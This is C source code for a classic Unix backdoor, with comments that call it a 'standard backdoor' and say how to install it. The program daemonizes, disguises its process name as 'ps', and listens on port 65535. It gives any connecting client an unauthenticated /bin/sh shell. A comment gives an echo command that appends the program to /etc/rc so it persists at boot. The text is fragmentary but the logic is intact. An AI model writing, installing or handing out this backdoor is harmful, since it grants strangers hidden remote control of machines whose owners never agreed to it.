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* telnet to port 65535 then type command followed by a ; *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* echo path/to/prog &gt;&gt; /etc/rc *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* this is pretty much your standard backdoor *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include &lt;stdio.h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include &lt;stdlib.h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include &lt;sys/socket.h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include &lt;sys/types.h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include &lt;netinet/in.h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include &lt;unistd.h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include &lt;netdb.h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d mk_daemon(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 main(int argc, char **argv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 lfd,cfd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klen_t len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uct sockaddr_in cli,serv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d_t pid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 **sh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[0]="/bin/sh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[1]=NULL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k_daemon(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ncpy(argv[0],"ps",sizeof(argv[0])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fd=socket(AF_INET,SOCK_STREAM,0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zero(&amp;serv,sizeof(serv)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.sin_family=AF_INE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.sin_addr.s_addr=htonl(INADDR_ANY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.sin_port=htons(65535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nd(lfd,(struct sockaddr *)&amp;serv,sizeof(serv)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en(lfd,5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le(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n=sizeof(cli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fd=accept(lfd,(struct sockaddr *)&amp;cli,&amp;len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f(!(pid=fork())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up2(cfd,0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up2(cfd,1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up2(cfd,2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xecve(sh[0],sh,NULL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lose(cfd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xit(0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se(cfd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urn 0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d mk_daemon(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* yes I did get this out of UNP *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 x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d_t pid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f((pid=fork()) !=0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xit(-1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sid(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l(SIGHUP,SIG_IGN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l(SIGINT,SIG_IGN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f((pid=fork()) !=0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xit(-1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dir("/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ask(0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or(x=0;x&lt;=64;x++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lose(x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